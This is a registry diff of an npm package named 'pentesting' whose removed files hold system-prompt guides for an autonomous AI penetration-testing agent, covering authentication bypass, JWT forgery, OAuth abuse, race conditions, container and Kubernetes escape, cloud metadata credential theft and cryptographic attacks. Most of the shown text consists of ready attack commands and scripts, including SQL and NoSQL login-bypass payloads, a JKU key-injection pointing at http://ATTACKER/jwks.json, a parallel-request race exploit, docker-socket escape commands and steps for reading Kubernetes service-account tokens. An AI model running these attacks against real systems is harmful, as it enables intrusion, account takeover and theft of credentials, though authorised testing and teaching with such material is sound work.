pentesting 0.73.13 → 0.90.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (70) hide show
  1. package/README.md +120 -44
  2. package/bin/pentesting.mjs +32 -0
  3. package/lib/runtime.mjs +419 -0
  4. package/package.json +17 -46
  5. package/scripts/postinstall.mjs +30 -0
  6. package/scripts/preflight-local.sh +24 -0
  7. package/dist/ad/prompt.md +0 -60
  8. package/dist/agent-tool-KHXXTHGS.js +0 -989
  9. package/dist/api/prompt.md +0 -63
  10. package/dist/chunk-4UNNRHYY.js +0 -5797
  11. package/dist/chunk-GILD75OT.js +0 -11407
  12. package/dist/chunk-S5ZMXFHR.js +0 -1162
  13. package/dist/cloud/prompt.md +0 -49
  14. package/dist/container/prompt.md +0 -58
  15. package/dist/database/prompt.md +0 -58
  16. package/dist/email/prompt.md +0 -44
  17. package/dist/file-sharing/prompt.md +0 -56
  18. package/dist/ics/prompt.md +0 -76
  19. package/dist/main.d.ts +0 -1
  20. package/dist/main.js +0 -9777
  21. package/dist/network/prompt.md +0 -49
  22. package/dist/persistence-U2N3KWFH.js +0 -13
  23. package/dist/process-registry-4Y3HB4YQ.js +0 -30
  24. package/dist/prompts/base.md +0 -436
  25. package/dist/prompts/ctf-crypto.md +0 -168
  26. package/dist/prompts/ctf-forensics.md +0 -182
  27. package/dist/prompts/ctf-pwn.md +0 -137
  28. package/dist/prompts/evasion.md +0 -215
  29. package/dist/prompts/exploit.md +0 -416
  30. package/dist/prompts/infra.md +0 -114
  31. package/dist/prompts/llm/analyst-system.md +0 -76
  32. package/dist/prompts/llm/context-extractor-system.md +0 -19
  33. package/dist/prompts/llm/input-processor-system.md +0 -64
  34. package/dist/prompts/llm/memory-synth-system.md +0 -14
  35. package/dist/prompts/llm/playbook-synthesizer-system.md +0 -10
  36. package/dist/prompts/llm/reflector-system.md +0 -16
  37. package/dist/prompts/llm/report-generator-system.md +0 -21
  38. package/dist/prompts/llm/strategist-fallback.md +0 -9
  39. package/dist/prompts/llm/triage-system.md +0 -47
  40. package/dist/prompts/main-agent.md +0 -193
  41. package/dist/prompts/offensive-playbook.md +0 -250
  42. package/dist/prompts/payload-craft.md +0 -181
  43. package/dist/prompts/post.md +0 -185
  44. package/dist/prompts/recon.md +0 -296
  45. package/dist/prompts/report.md +0 -98
  46. package/dist/prompts/strategist-system.md +0 -472
  47. package/dist/prompts/strategy.md +0 -163
  48. package/dist/prompts/techniques/README.md +0 -40
  49. package/dist/prompts/techniques/ad-attack.md +0 -261
  50. package/dist/prompts/techniques/auth-access.md +0 -256
  51. package/dist/prompts/techniques/container-escape.md +0 -103
  52. package/dist/prompts/techniques/crypto.md +0 -296
  53. package/dist/prompts/techniques/enterprise-pentest.md +0 -175
  54. package/dist/prompts/techniques/file-attacks.md +0 -144
  55. package/dist/prompts/techniques/forensics.md +0 -313
  56. package/dist/prompts/techniques/injection.md +0 -217
  57. package/dist/prompts/techniques/lateral.md +0 -128
  58. package/dist/prompts/techniques/network-svc.md +0 -229
  59. package/dist/prompts/techniques/pivoting.md +0 -205
  60. package/dist/prompts/techniques/privesc.md +0 -190
  61. package/dist/prompts/techniques/pwn.md +0 -595
  62. package/dist/prompts/techniques/reversing.md +0 -183
  63. package/dist/prompts/techniques/sandbox-escape.md +0 -73
  64. package/dist/prompts/techniques/shells.md +0 -194
  65. package/dist/prompts/vuln.md +0 -190
  66. package/dist/prompts/web.md +0 -318
  67. package/dist/prompts/zero-day.md +0 -298
  68. package/dist/remote-access/prompt.md +0 -52
  69. package/dist/web/prompt.md +0 -59
  70. package/dist/wireless/prompt.md +0 -62
@@ -1,256 +0,0 @@
1
- # Authentication & Access Control Attacks — Autonomous Guide
2
-
3
- > **§3 Minimal Specification**: This file is a **Bootstrap reference**, not a prescribed order.
4
- > Do NOT follow the attack tree linearly. Use `get_owasp_knowledge`, `web_search`, and observed
5
- > target behavior to decide what to test and in what order. Adapt to the target — not to this list.
6
-
7
- > **Cross-ref**: web.md, injection.md, post.md (privesc)
8
-
9
- ## Attack Categories
10
-
11
- ```
12
- AUTH/ACCESS ATTACK MAP:
13
-
14
- ├── 1. Authentication Bypass
15
- │ ├── Default credentials → web_search("{service} default credentials")
16
- │ ├── SQL injection in login: admin'-- , ' OR 1=1--, admin'/*
17
- │ ├── NoSQL injection: {"username":{"$gt":""},"password":{"$gt":""}}
18
- │ ├── Mass assignment: register with admin=true, role=admin, isAdmin=1
19
- │ ├── Response manipulation: change HTTP response (401→200, "false"→"true")
20
- │ ├── Password reset flaws:
21
- │ │ ├── Predictable token, token reuse, no expiry
22
- │ │ ├── Host header injection in reset link
23
- │ │ ├── IDOR in reset endpoint (reset anyone's password)
24
- │ │ └── Race condition: use token before invalidation
25
- │ ├── MFA bypass:
26
- │ │ ├── Skip to post-MFA endpoint directly
27
- │ │ ├── Brute force OTP (4-6 digit = limited keyspace)
28
- │ │ ├── Response manipulation (change status code)
29
- │ │ ├── Backup codes brute force, default backup codes
30
- │ │ └── web_search("MFA bypass techniques {year}")
31
- │ ├── Remember me / persistent login:
32
- │ │ ├── Predictable cookie value → forge for other users
33
- │ │ ├── Insufficient entropy in token
34
- │ │ └── Token not bound to IP/user-agent
35
- │ └── web_search("authentication bypass techniques hacktricks")
36
-
37
- ├── 2. Session Attacks
38
- │ ├── Session fixation: force known session ID
39
- │ ├── Session hijacking: steal via XSS, network sniffing
40
- │ ├── Session prediction: analyze session ID patterns → predict next
41
- │ ├── Insufficient session expiry: reuse old sessions
42
- │ ├── Cookie manipulation: change cookie values (user ID, role)
43
- │ ├── Session puzzling: same session variable used differently
44
- │ └── web_search("session attack techniques OWASP")
45
-
46
- ├── 3. JWT Attacks
47
- │ ├── [RECON] Decode token first (never inspect raw):
48
- │ │ └── python3 -c "import base64,sys,json; p=sys.argv[1].split('.'); print(json.dumps(json.loads(base64.b64decode(p[0]+'==').decode()),indent=2)); print(json.dumps(json.loads(base64.b64decode(p[1]+'==').decode()),indent=2))" <JWT>
49
- │ │
50
- │ ├── A. Algorithm confusion: RS256 → HS256 (sign with public key)
51
- │ │ ├── Get public key from /jwks.json, /.well-known/openid-configuration, or /api/v1/certs
52
- │ │ ├── Convert PEM to appropriate form and use as HMAC secret:
53
- │ │ │ python3 -c "
54
- │ │ │ import jwt, base64
55
- │ │ │ pub = open('public.pem').read()
56
- │ │ │ payload = {'sub':'admin','role':'admin','iat':9999999999}
57
- │ │ │ token = jwt.encode(payload, pub, algorithm='HS256')
58
- │ │ │ print(token)"
59
- │ │ └── Send forged token, check if RS256 check is bypassed
60
- │ │
61
- │ ├── B. None algorithm: remove signature entirely
62
- │ │ ├── Modify header: {"alg":"none","typ":"JWT"} → base64url encode
63
- │ │ ├── Modify payload: change sub/role/admin claims
64
- │ │ ├── Set signature to empty: header.payload. (trailing dot, no sig)
65
- │ │ └── Try variations: "None", "NONE", "nOnE" (case sensitivity bypass)
66
- │ │
67
- │ ├── C. JWK/JKU injection: host your own signing key
68
- │ │ ├── Generate RSA key pair: openssl genrsa -out attacker.pem 2048
69
- │ │ ├── Start HTTP server: python3 -m http.server 8888
70
- │ │ ├── Option 1 JKU: add "jku":"http://ATTACKER/jwks.json" to header
71
- │ │ ├── Option 2 JWK: embed public key directly in "jwk" header param
72
- │ │ ├── Sign token with your private key, server fetches & trusts your key
73
- │ │ └── Tool: python3 -m jwt_tool <JWT> -X s -ju http://ATTACKER/jwks.json
74
- │ │
75
- │ ├── D. Kid (Key ID) attacks
76
- │ │ ├── Path traversal: {"kid":"../../../../dev/null"} → HMAC secret = ""
77
- │ │ │ Sign with empty string: python3 -c "import jwt; print(jwt.encode({'sub':'admin'}, '', algorithm='HS256'))"
78
- │ │ ├── kid = "../../dev/null" → empty key → predictable signature
79
- │ │ ├── SQL injection in kid: {"kid":"' UNION SELECT 'secret'--"}
80
- │ │ │ → DB returns controlled value as secret → sign with that value
81
- │ │ └── kid = file path to known content: /proc/sys/kernel/hostname
82
- │ │
83
- │ ├── E. Secret brute force
84
- │ │ ├── hashcat -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt
85
- │ │ └── john --format=HMAC-SHA256 --wordlist=rockyou.txt jwt.txt
86
- │ │
87
- │ ├── F. Claim manipulation (without verifying sig)
88
- │ │ ├── Change: sub, user_id, role, admin, email, exp (set far future)
89
- │ │ └── Tool: python3 -m jwt_tool <JWT> -I -pc role -pv admin
90
- │ │
91
- │ └── web_search("JWT attack techniques portswigger {year}")
92
- │ web_search("jwt_tool cheatsheet")
93
-
94
- ├── 4. OAuth/OpenID Connect Attacks
95
- │ ├── [RECON] Map the flow first:
96
- │ │ ├── Find: /authorize, /token, /userinfo, /.well-known/openid-configuration
97
- │ │ ├── Note: response_type (code/token), grant_type, client_id, redirect_uri
98
- │ │ └── Check: state parameter present? PKCE used?
99
- │ │
100
- │ ├── A. Redirect URI manipulation → token theft
101
- │ │ ├── Add path: ?redirect_uri=https://legit.com/callback/../attacker.com
102
- │ │ ├── Add param: ?redirect_uri=https://legit.com?x=attacker.com
103
- │ │ ├── Open redirect chain: legit redirect → open redirect → attacker
104
- │ │ └── Referrer leak: navigate from token URL to external resource
105
- │ │
106
- │ ├── B. State parameter CSRF (missing or predictable state)
107
- │ │ ├── If state absent: craft malicious authorization URL → victim clicks
108
- │ │ ├── If state predictable: generate valid state, pre-authorize
109
- │ │ └── Result: bind victim's OAuth to attacker account
110
- │ │
111
- │ ├── C. Authorization code interception
112
- │ │ ├── Code in URL → appears in Referer header to third-party resources
113
- │ │ ├── Code in logs → check open log endpoints
114
- │ │ └── Replay: codes often single-use but check if reusable
115
- │ │
116
- │ ├── D. PKCE bypass (Proof Key for Code Exchange)
117
- │ │ ├── Check if code_challenge validation is enforced
118
- │ │ ├── Try omitting code_verifier → if server accepts → PKCE not enforced
119
- │ │ └── Downgrade: try response_type=token (implicit) instead of code
120
- │ │
121
- │ ├── E. Scope escalation
122
- │ │ ├── Add scopes: openid profile email admin offline_access
123
- │ │ └── Check if server returns broader access than requested
124
- │ │
125
- │ ├── F. Implicit flow token leakage (older pattern, still found)
126
- │ │ ├── Token in URL fragment → appears in browser history, Referer
127
- │ │ └── Single-page apps may log token to console/error handlers
128
- │ │
129
- │ ├── G. SSRF via OAuth
130
- │ │ ├── authorization URL → internal service scan
131
- │ │ └── request_uri in PAR (Pushed Authorization Requests)
132
- │ │
133
- │ └── web_search("OAuth security vulnerabilities exploitation portswigger")
134
- │ web_search("OAuth 2.0 attack techniques {year}")
135
-
136
- ├── 5. IDOR (Insecure Direct Object Reference)
137
- │ ├── Parameter manipulation: /api/user/123 → /api/user/124
138
- │ ├── In: URL, POST body, JSON, cookies, headers, file names
139
- │ ├── Encoded IDs: base64 decode → modify → re-encode
140
- │ ├── UUID/GUID: not always random (predictable in some implementations)
141
- │ ├── Sequential testing: iterate through IDs systematically
142
- │ ├── HTTP method change: GET blocked → POST, PUT, PATCH, DELETE
143
- │ └── Affects: view/edit/delete other users' data, access admin functions
144
-
145
- ├── 6. Access Control Bypass
146
- │ ├── Horizontal: access other users' resources (same privilege level)
147
- │ ├── Vertical: access admin/higher-privilege resources
148
- │ ├── Method-based: POST blocked → GET, PUT, PATCH, OPTIONS
149
- │ ├── Path-based: /admin/ blocked → /ADMIN/, /Admin, /./admin/, //admin
150
- │ ├── Header-based: X-Original-URL, X-Rewrite-URL, X-Forwarded-For
151
- │ ├── Referer-based: add expected Referer header
152
- │ ├── IP-based: add X-Forwarded-For: 127.0.0.1
153
- │ ├── API versioning: /api/v1/admin blocked → /api/v2/admin, /api/internal/
154
- │ ├── Parameter pollution: duplicate parameters with different values
155
- │ └── web_search("access control bypass techniques hacktricks")
156
-
157
- ├── 7. Rate Limiting Bypass
158
- │ ├── IP rotation headers: X-Forwarded-For, X-Real-IP, X-Originating-IP
159
- │ ├── Different endpoints: /login vs /LOGIN vs /Login
160
- │ ├── Parameter pollution: add dummy parameters
161
- │ ├── Different HTTP methods: POST → PUT
162
- │ ├── Unicode variations: admin vs admın (dotless i)
163
- │ ├── Distributed: multiple source IPs
164
- │ └── Timing: slow down just below rate limit threshold
165
-
166
- └── 8. Business Logic Flaws & Race Conditions
167
- ├── Price manipulation: negative quantities, decimal exploitation
168
- ├── Workflow bypass: skip steps (order→pay→confirm → order→confirm)
169
- ├── Type juggling: PHP == vs === (0 == "string" → true)
170
- ├── Integer overflow: very large numbers → wrap to negative/zero
171
- ├── Referral/reward abuse: self-referral, race condition on signup
172
-
173
- └── Race Conditions (Limit-Override / TOCTOU):
174
- ├── [DETECTION] Does action have a check → use window?
175
- │ └── Examples: balance check, coupon validity, token invalidation
176
-
177
- ├── [EXPLOIT A] Parallel HTTP requests (asyncio — write file, run it)
178
- │ write_file path=".pentesting/workspace/race.py" content="""
179
- │ import asyncio, aiohttp, sys
180
-
181
- │ URL = sys.argv[1] if len(sys.argv)>1 else 'http://TARGET/endpoint'
182
- │ DATA = {'coupon': 'SAVE50', 'amount': '100'}
183
- │ PARALLEL = 50
184
-
185
- │ async def race():
186
- │ async with aiohttp.ClientSession() as s:
187
- │ tasks = [s.post(URL, data=DATA) for _ in range(PARALLEL)]
188
- │ results = await asyncio.gather(*tasks, return_exceptions=True)
189
- │ for i, r in enumerate(results):
190
- │ if hasattr(r,'status'):
191
- │ text = await r.text()
192
- │ print(f'[{i}] {r.status}: {text[:100]}')
193
- │ asyncio.run(race())
194
- │ """
195
- │ Then: run_cmd "python3 .pentesting/workspace/race.py http://TARGET/redeem"
196
-
197
- ├── [EXPLOIT B] curl parallel (no Python needed)
198
- │ run_cmd "seq 50 | xargs -P50 -I{} curl -s -X POST http://TARGET/redeem -d 'coupon=SAVE50'"
199
-
200
- ├── [EXPLOIT C] TOCTOU symlink race (file operations)
201
- │ ├── Monitor: inotifywait -m /tmp/uploads -e create
202
- │ ├── Race: while true; do ln -sf /etc/passwd /tmp/target; done
203
- │ └── Trigger upload simultaneously
204
-
205
- ├── [SUCCESS SIGNAL] One request returns 200, others return 409/error
206
- │ └── If all return 200 → not fixed, try extracting duplicate benefit
207
-
208
- └── web_search("race condition portswigger limit override")
209
- web_search("TOCTOU exploit {context} {year}")
210
- ```
211
-
212
- ## JWT Decision Tree
213
- ```
214
- Intercept JWT →
215
- ├── Decode header → check "alg" field
216
- │ ├── "RS256"/"ES256" → try A (HS256 confusion) + C (JWK inject)
217
- │ ├── "HS256" → try E (brute force) + D (kid attacks)
218
- │ └── "none" → already vulnerable, forge freely
219
- ├── Check "kid" field present? → try D (path traversal + SQLi)
220
- ├── Check "jku"/"jwk" field? → try C (inject your own key)
221
- └── No strong alg? → try B (none algorithm)
222
- ```
223
-
224
- ## Session & Token Extraction (save_session workflow)
225
- ```
226
- After browse_url or fill_form with save_session: true, TWO files are saved:
227
-
228
- .pentesting/workspace/browser-session.json → Playwright state (use_session)
229
- .pentesting/workspace/auth-headers.json → Extracted headers for ANY tool
230
-
231
- auth-headers.json example:
232
- { "Authorization": "Bearer eyJ0eXAiOiJKV1Q...", "Cookie": "session=abc123" }
233
-
234
- Reuse in run_cmd:
235
- AUTH=.pentesting/workspace/auth-headers.json
236
- TOKEN=$(jq -r .Authorization $AUTH)
237
- COOKIE=$(jq -r '.["Cookie"]' $AUTH)
238
-
239
- curl -s -H "Authorization: $TOKEN" -H "Cookie: $COOKIE" http://TARGET/api/admin
240
- sqlmap -u "http://TARGET/api/data?id=1" --headers="Authorization: $TOKEN" --dbs
241
- python3 -c "import json,requests; h=json.load(open('$AUTH')); print(requests.get('http://TARGET/api/me',headers=h).text)"
242
-
243
- If Authorization key is missing (session-only app):
244
- curl -b "$COOKIE" http://TARGET/admin
245
- ```
246
-
247
- ## Search Patterns
248
- ```
249
- web_search("{auth_mechanism} bypass techniques")
250
- web_search("broken access control exploitation hacktricks")
251
- web_search("IDOR exploitation techniques {year}")
252
- web_search("{technology} authentication vulnerability")
253
- web_search("PayloadsAllTheThings {attack_type}")
254
- web_search("jwt_tool usage portswigger")
255
- web_search("OAuth 2.0 vulnerability {grant_type} exploitation")
256
- ```
@@ -1,103 +0,0 @@
1
- # Container Escape & Cloud Attack Techniques
2
-
3
- ## Docker Container Detection
4
- ```
5
- Am I in a container?
6
- ├── cat /proc/1/cgroup → contains "docker" or container ID?
7
- ├── ls /.dockerenv → exists = Docker container
8
- ├── hostname → random hex string = likely container
9
- ├── mount | grep overlay → overlay filesystem = container
10
- ├── cat /proc/self/status | grep CapEff → limited capabilities?
11
- └── env | grep -i docker → Docker-related env vars?
12
- ```
13
-
14
- ## Docker Escape Techniques
15
- ```
16
- 1. Privileged container (--privileged):
17
- ├── Full device access → mount host filesystem
18
- │ mkdir /mnt/host && mount /dev/sda1 /mnt/host
19
- │ cat /mnt/host/root/root.txt
20
- ├── nsenter: nsenter --target 1 --mount --uts --ipc --net --pid
21
- └── Load kernel module: insmod backdoor.ko
22
-
23
- 2. Docker socket mounted (-v /var/run/docker.sock):
24
- ├── docker -H unix:///var/run/docker.sock ps
25
- ├── Create privileged container:
26
- │ docker run -it --privileged --pid=host -v /:/host ubuntu chroot /host
27
- └── Access host filesystem through new container
28
-
29
- 3. Dangerous capabilities:
30
- ├── CAP_SYS_ADMIN → mount host devices, use nsenter
31
- ├── CAP_SYS_PTRACE → process injection, debug host processes
32
- ├── CAP_NET_ADMIN → ARP spoof, network manipulation
33
- ├── CAP_DAC_READ_SEARCH → read any file
34
- └── Check: capsh --print | grep Current
35
-
36
- 4. Writable host paths:
37
- ├── If anything is mounted from host (-v /hostpath:/container):
38
- │ Write to that path to affect host
39
- ├── Common: /var/log, /tmp, /opt, config directories
40
- └── Write crontab/SSH key to mounted host path
41
-
42
- 5. Kernel exploits:
43
- ├── Container shares kernel with host
44
- ├── uname -r → search for kernel CVEs
45
- ├── CVE-2022-0847 (DirtyPipe)
46
- ├── CVE-2022-0185 (fsconfig heap overflow)
47
- └── CVE-2024-21626 (runc breakout via /proc/self/fd)
48
-
49
- 6. Docker API (2375/2376):
50
- ├── Unauthenticated Docker API = instant host compromise
51
- ├── docker -H tcp://<target>:2375 ps
52
- └── Create privileged container mounting host /
53
- ```
54
-
55
- ## Kubernetes Escape
56
- ```
57
- 1. Service account token:
58
- ├── cat /var/run/secrets/kubernetes.io/serviceaccount/token
59
- ├── Use token to query API: curl -sk https://kubernetes.default.svc/api/v1/
60
- ├── Enumerate permissions: kubectl auth can-i --list
61
- └── If can create pods → privileged pod escape
62
-
63
- 2. Privileged pod:
64
- ├── Create pod with hostPID, hostNetwork, privileged: true
65
- ├── Mount host filesystem: volumeMounts hostPath /
66
- └── nsenter --target 1 --mount --uts --ipc --net --pid bash
67
-
68
- 3. etcd access:
69
- ├── etcd often unauthenticated on port 2379
70
- ├── Contains ALL K8s secrets: etcdctl get --prefix /registry/secrets
71
- └── Includes service account tokens, DB passwords, etc.
72
-
73
- 4. Common K8s misconfigs:
74
- ├── Dashboard without auth (port 8443/30000)
75
- ├── Tiller (Helm v2) without auth → arbitrary K8s operations
76
- ├── Kubelet API (10250) without auth → exec into any pod
77
- │ curl -sk https://<node>:10250/pods
78
- │ curl -sk https://<node>:10250/exec/<ns>/<pod>/<container> -d "cmd=id"
79
- └── RBAC misconfiguration → escalate to cluster-admin
80
- ```
81
-
82
- ## Cloud Metadata
83
- ```
84
- Cloud metadata endpoints (SSRF targets):
85
- ├── AWS: http://169.254.169.254/latest/meta-data/
86
- │ ├── /iam/security-credentials/ → IAM role credentials
87
- │ ├── /user-data → startup scripts (often contain secrets)
88
- │ └── IMDSv2: TOKEN=$(curl -X PUT http://169.254.169.254/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
89
- │ curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/
90
- ├── GCP: http://metadata.google.internal/computeMetadata/v1/
91
- │ └── Requires header: Metadata-Flavor: Google
92
- ├── Azure: http://169.254.169.254/metadata/instance?api-version=2021-02-01
93
- │ └── Requires header: Metadata: true
94
- └── DigitalOcean: http://169.254.169.254/metadata/v1/
95
-
96
- Post-exploitation with cloud creds:
97
- ├── AWS: Configure aws cli → enumerate IAM, S3, Lambda, EC2
98
- │ aws sts get-caller-identity
99
- │ aws s3 ls
100
- │ aws iam list-users
101
- ├── GCP: gcloud auth activate-service-account → enumerate
102
- └── Azure: az login → enumerate resources
103
- ```
@@ -1,296 +0,0 @@
1
- # Cryptography Attack Techniques
2
-
3
- ## Hash Cracking
4
- ```
5
- Identify hash type:
6
- ├── hashid <hash> OR hash-identifier
7
- ├── Online: hashes.com, crackstation.net
8
- └── hashcat --example-hashes | grep -B1 <hash_start>
9
-
10
- Crack with hashcat:
11
- ├── MD5: hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
12
- ├── SHA1: hashcat -m 100 hash.txt rockyou.txt
13
- ├── SHA256: hashcat -m 1400 hash.txt rockyou.txt
14
- ├── bcrypt: hashcat -m 3200 hash.txt rockyou.txt
15
- ├── NTLM: hashcat -m 1000 hash.txt rockyou.txt
16
- ├── Kerberos TGS: hashcat -m 13100 hash.txt rockyou.txt
17
- ├── NetNTLMv2: hashcat -m 5600 hash.txt rockyou.txt
18
- └── With rules: hashcat -m 0 hash.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule
19
-
20
- John the Ripper:
21
- ├── john --wordlist=rockyou.txt hash.txt
22
- ├── john --show hash.txt
23
- └── john --rules=All hash.txt
24
- ```
25
-
26
- ## RSA Attacks
27
- ```
28
- When you find RSA parameters (n, e, c, p, q):
29
-
30
- Small n → factor with:
31
- ├── factordb.com (online)
32
- ├── RsaCtfTool: python3 RsaCtfTool.py -n <n> -e <e> --uncipher <c>
33
- └── yafu: yafu "factor(n)"
34
-
35
- Common RSA weaknesses:
36
- ├── Small e (e=3) → cube root attack
37
- ├── Common modulus → shared p or q between keys
38
- ├── Wiener's attack → small d (large e)
39
- ├── Hastad's broadcast → same m encrypted with different n, same small e
40
- ├── Bleichenbacher → padding oracle on PKCS#1 v1.5
41
- ├── Fermat factoring → p and q close together
42
- └── Twin prime → p = q ± 2
43
-
44
- Python template:
45
- from Crypto.Util.number import *
46
- n, e, c = ...
47
- # After finding p, q:
48
- phi = (p-1)*(q-1)
49
- d = inverse(e, phi)
50
- m = pow(c, d, n)
51
- print(long_to_bytes(m))
52
- ```
53
-
54
- ## Classical Ciphers
55
- ```
56
- Common in CTF misc/crypto:
57
- ├── Caesar/ROT13: Try all 26 shifts → dcode.fr/caesar-cipher
58
- ├── Vigenère: Key analysis → dcode.fr/vigenere-cipher
59
- ├── XOR: Single-byte XOR brute → CyberChef XOR Brute Force
60
- ├── Substitution: Frequency analysis → quipqiup.com
61
- ├── Base encodings:
62
- │ ├── Base64: = padding, A-Za-z0-9+/
63
- │ ├── Base32: = padding, A-Z2-7
64
- │ └── Base85/ASCII85: ~> delimiter
65
- ├── Hex: 0-9a-f only → xxd -r -p
66
- └── Morse/Braille/Semaphore: visual pattern recognition
67
- ```
68
-
69
- ## Padding Oracle Attack
70
- ```
71
- When you can detect valid vs invalid padding:
72
- ├── padbuster: padbuster <URL> <encrypted_sample> <block_size>
73
- │ Options: -cookies "auth=<encrypted>" -encoding 0 (lowercase hex)
74
- ├── Manual: Compare response to correct vs incorrect padding
75
- └── Decrypt AND forge new tokens — often leads to admin access
76
- ```
77
-
78
- ## Elliptic Curve Attacks
79
- ```
80
- ECC vulnerabilities in CTF:
81
- ├── Invalid curve attack:
82
- │ Point not validated → send point on weak curve
83
- │ Compute DLP on weak curve → recover private key
84
- ├── Smart's attack: anomalous curves (trace=1)
85
- │ Lift to p-adic → solve in O(1)
86
- ├── MOV attack: small embedding degree
87
- │ Move DLP to finite field via Weil pairing
88
- ├── Pohlig-Hellman: smooth curve order
89
- │ Factor order → solve DLP in subgroups → CRT
90
- ├── ECDSA nonce reuse (k reuse):
91
- │ Two signatures with same k → recover private key
92
- │ s1*k - H(m1) ≡ s2*k - H(m2) mod n
93
- │ k = (H(m1) - H(m2)) / (s1 - s2) mod n
94
- ├── Biased nonce (lattice attack):
95
- │ Partial nonce leak → Hidden Number Problem → LLL
96
- └── Curve parameter manipulation:
97
- Custom curve with weak parameters → check order
98
-
99
- SageMath template:
100
- E = EllipticCurve(GF(p), [a, b])
101
- G = E(Gx, Gy)
102
- P = E(Px, Py) # public key point
103
- # discrete_log for small order:
104
- d = G.discrete_log(P)
105
- ```
106
-
107
- ## AES / Block Cipher Attacks
108
- ```
109
- Identify cipher mode and attack:
110
- ├── ECB detection: same plaintext block → same ciphertext block
111
- │ Send repeated 16-byte blocks → check for repeating output
112
- │ ECB penguin: byte-at-a-time chosen-plaintext → decrypt flag
113
- ├── CBC bit-flipping:
114
- │ Modify ciphertext byte → predictable change in next block plaintext
115
- │ Change "admin=0" → "admin=1" by XORing correct byte
116
- │ Target byte: C[i][j] ^= old_val ^ new_val
117
- ├── CBC-MAC forgery:
118
- │ Length extension if no length prepend
119
- │ MAC(m1) ⊕ m2_first_block → forge MAC(m1 || m2)
120
- ├── CTR mode: nonce reuse → XOR ciphertexts → crib dragging
121
- │ C1 ⊕ C2 = P1 ⊕ P2 → known plaintext reveals other
122
- ├── GCM nonce reuse: recover auth key H → forge tags
123
- └── Key recovery:
124
- Known plaintext + ciphertext → differential/linear cryptanalysis
125
- Related-key attack: if key modification is possible
126
-
127
- CyberChef operations for quick crypto:
128
- ├── AES Decrypt → try ECB/CBC with extracted key/IV
129
- ├── XOR → brute-force single-byte key (all 256)
130
- ├── From Hex / From Base64 → decode layers
131
- └── Magic → auto-detect encoding/encryption
132
- ```
133
-
134
- ## Modern / Advanced Crypto
135
- ```
136
- Lattice-based (common in hard CTF crypto):
137
- ├── LLL algorithm: basis reduction → find short vectors
138
- │ from fpylll import IntegerMatrix, LLL
139
- │ M = IntegerMatrix(rows)
140
- │ LLL.reduction(M)
141
- ├── Knapsack crypto: reduce to SVP → LLL
142
- ├── Coppersmith: find small roots of polynomial mod N
143
- │ SageMath: small_roots(X=bound, beta=0.5)
144
- │ Common use: partial known plaintext in RSA
145
- ├── Hidden Number Problem (HNP):
146
- │ Biased ECDSA nonce → LLL → recover key
147
- └── NTRU: lattice-based → LLL reduction
148
-
149
- Side-channel (rare but appears at DEF CON):
150
- ├── Timing attack: response time varies with input
151
- │ → Character-by-character brute force with timing measurement
152
- │ → Script: measure response_time for each char candidate
153
- ├── Power analysis: if given power traces
154
- │ Differential Power Analysis (DPA) → recover AES key
155
- └── Cache timing: Flush+Reload on shared libraries
156
- ```
157
-
158
- ## Hash Attacks (Beyond Cracking)
159
-
160
- ```
161
- Length Extension Attack:
162
- ├── Vulnerable: MD5, SHA1, SHA256 (Merkle-Damgård construction)
163
- ├── NOT vulnerable: SHA3, HMAC, truncated hashes
164
- ├── Tool: hash_extender or HashPump
165
- │ hash_extender --data "known" --secret-len 16 --append "admin=true" --signature <hash>
166
- ├── When to use: MAC = H(secret || user_data) → append data without knowing secret
167
- └── Result: valid MAC for extended message
168
-
169
- Collision Attack:
170
- ├── MD5: Generate two files with same MD5 hash
171
- │ Tool: fastcoll or HashClash
172
- │ Use: bypass file comparison, forge certificates
173
- ├── SHA1: SHAttered (practical collision exists)
174
- └── When: "if md5(file1) == md5(file2)" type checks
175
-
176
- Rainbow Table:
177
- ├── CrackStation: crackstation.net for quick lookups
178
- ├── hashes.org: community hash lookup
179
- ├── For custom charsets: rtgen from RainbowCrack project
180
- └── Limited to unsalted hashes
181
- ```
182
-
183
- ## RSA — Extended Attack Catalog
184
-
185
- ```
186
- ═══════════════════════════════════════
187
- Franklin-Reiter Related Message:
188
- ═══════════════════════════════════════
189
- ├── Two messages with known relationship: m2 = a*m1 + b
190
- ├── Same RSA key → gcd of polynomials → recover both messages
191
- ├── Common: m2 = m1 + padding_difference
192
- └── SageMath: gcd of (x^e - c1) and ((a*x+b)^e - c2) in Z_n[x]
193
-
194
- ═══════════════════════════════════════
195
- Boneh-Durfee:
196
- ═══════════════════════════════════════
197
- ├── Small private exponent (d < n^0.292)
198
- ├── Stronger than Wiener's (which requires d < n^0.25)
199
- ├── Lattice-based: construct lattice → LLL → factor n
200
- └── Tool: web_search("boneh durfee RSA CTF implementation")
201
-
202
- ═══════════════════════════════════════
203
- Multi-prime RSA:
204
- ═══════════════════════════════════════
205
- ├── n = p * q * r (or more primes)
206
- ├── phi = (p-1)(q-1)(r-1)
207
- ├── Each extra prime → easier to factor
208
- ├── factordb.com often factors multi-prime n
209
- └── Lambda function: lcm(p-1, q-1, r-1) — may be needed for d
210
-
211
- ═══════════════════════════════════════
212
- Chinese Remainder Theorem (CRT):
213
- ═══════════════════════════════════════
214
- ├── When: m^e < n (small message, large modulus)
215
- │ Direct e-th root: m = iroot(c, e) (integer root)
216
- ├── Hastad improved with CRT:
217
- │ Multiple (n_i, c_i) with same e → CRT → then e-th root
218
- ├── When: same message encrypted with different moduli
219
- └── SageMath: CRT_list(remainders, moduli)
220
-
221
- ═══════════════════════════════════════
222
- RSA with known bits:
223
- ═══════════════════════════════════════
224
- ├── Partial p/q known → Coppersmith small_roots
225
- ├── Partial d known → Coppersmith on d
226
- ├── Example: "p starts with AAAA..." → known MSB → Coppersmith
227
- └── SageMath: f.small_roots(X=2^unknown_bits, beta=0.5)
228
- ```
229
-
230
- ## Automated Crypto Solving Strategy
231
-
232
- ```
233
- CTF crypto decision tree:
234
- 1. Check: is it a KNOWN cipher? (RSA, AES, XOR, custom)
235
- 2. Extract all parameters from challenge
236
- 3. For RSA:
237
- ├── Try RsaCtfTool first (covers 40+ attacks automatically!)
238
- │ python3 RsaCtfTool.py -n <n> -e <e> --uncipher <c> --attack all
239
- ├── Try factordb.com for n
240
